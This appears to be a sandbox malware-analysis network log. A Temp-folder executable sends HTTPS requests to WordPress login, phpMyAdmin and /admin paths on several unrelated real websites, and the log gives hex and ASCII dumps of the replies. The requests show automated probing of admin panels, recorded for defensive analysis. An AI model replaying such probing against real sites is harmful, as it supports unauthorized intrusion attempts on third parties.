2023-12-22 20:15:08 UTC	418	IN	Data Raw: 31 39 36 0d 0a 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 2f 28 74 72 69 64 65 6e 74 7c 6d 73 69 65 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 2f 5e 5b 41 2d 7a 30 2d 39 5f 2d 5d 2b 24 2f 2e 74 65 73 74 28 65 29 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 26 Data Ascii: 196<script>/(trident\|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
230	192.168.2.4	50433	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=8aonfjgkl3468gr5hac56tn05n; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/
2023-12-22 20:15:07 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:07 UTC	379	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 37 43 69 4b 64 31 46 7a 36 71 56 4c 76 6a 69 79 35 37 58 73 4f 31 70 7a 76 54 4f 6e 76 36 46 71 50 55 34 4a 77 6d 32 6d 44 25 32 42 43 77 42 67 6f 41 6b 49 5a 75 4e 67 41 37 4a 55 6a 76 4f 6a 71 46 5a 33 5a 63 4b 30 69 73 35 6f 75 45 54 6f 67 4c 46 6d 5a 74 50 65 72 68 76 4a 4f 35 61 6a 62 25 32 46 34 59 25 32 42 46 51 65 76 6b 61 77 73 6d 48 67 75 72 25 32 42 73 48 50 43 6d 65 4f 25 32 42 78 6a 38 68 50 79 55 50 46 33 69 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7CiKd1Fz6qVLvjiy57XsO1pzvTOnv6FqPU4Jwm2mD%2BCwBgoAkIZuNgA7JUjvOjqFZ3ZcK0is5ouETogLFmZtPerhvJO5ajb%2F4Y%2BFQevkawsmHgur%2BsHPCmeO%2Bxj8hPyUPF3i"}],"group":"cf-nel","max_age":6048
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: ducebox.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script
2023-12-22 20:15:07 UTC	273	IN	Data Raw: 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f Data Ascii: pt" id="user-profile-js-extra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
231	192.168.2.4	50340	64.68.191.221	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	181	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	597	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Result-Reason: Not Redirected X-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404 X-UA-Compatible: IE=edge Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly Set-Cookie: __RequestVerificationToken=x9dznwB6-fthLZ5jgEbmbVF66pLEB18zFPbokLKb5_FUvunxyt5nFAxMioMxhODNsJocLA2; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:07 GMT Connection: close Content-Length: 33332
2023-12-22 20:15:07 UTC	15787	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 46 43 36 36 47 35 43 43 37 50 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 Data Ascii: <!DOCTYPE html><html lang="en-US"><head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-FC66G5CC7P"></script><script> w
2023-12-22 20:15:07 UTC	16384	IN	Data Raw: 6c 65 43 6f 6e 74 65 6e 74 20 4d 6f 64 32 73 78 63 61 70 70 43 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 63 2d 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 27 20 20 64 61 74 61 2d 63 62 2d 69 6e 73 74 61 6e 63 65 3d 27 37 30 36 27 20 64 61 74 61 2d 63 62 2d 69 64 3d 27 37 30 36 27 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 6d 79 2d 36 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 36 20 63 6f 6c 2d 6c 67 2d 33 20 74 65 78 74 2d 63 65 6e 74 65 72 20 6d 62 2d 35 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 Data Ascii: leContent Mod2sxcappC"><div class='sc-content-block' data-cb-instance='706' data-cb-id='706'><div class="container my-6"> <div class="row"> <div class="col-sm-6 col-lg-3 text-center mb-5 d-flex flex-column align-items-center">
2023-12-22 20:15:07 UTC	1161	IN	Data Raw: 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 73 6c 69 6d 6d 65 6e 75 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 6c 6c 69 70 73 69 73 2e 6d 69 6e 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 Data Ascii: ?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.slimmenu.js?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.ellipsis.min.js?cdv=109" typ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.4	50393	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	333	OUT	GET /admin HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:06 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CUMjypQpkI25/kAN3X4dVwQeIDTLy3EwfI+vo7UPNL/ADH3slQvV3cOrVx4A9VYY1N7CaIPh1rqKiBw734a0qw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:07 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
233	192.168.2.4	50396	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	323	OUT	GET /admin HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:06 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_JekP6NopRcz0unQe+GCbv9btvSD3RF+Trql4knpE8poM/IOfAVv+vLJw8gVB5zd/aEfMdeBGFAhiKtJIPwuanw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:07 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
234	192.168.2.4	50394	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	171	OUT	GET /admin.php HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:07 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:15:07 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
235	192.168.2.4	50733	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	173	OUT	GET /admin.php HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
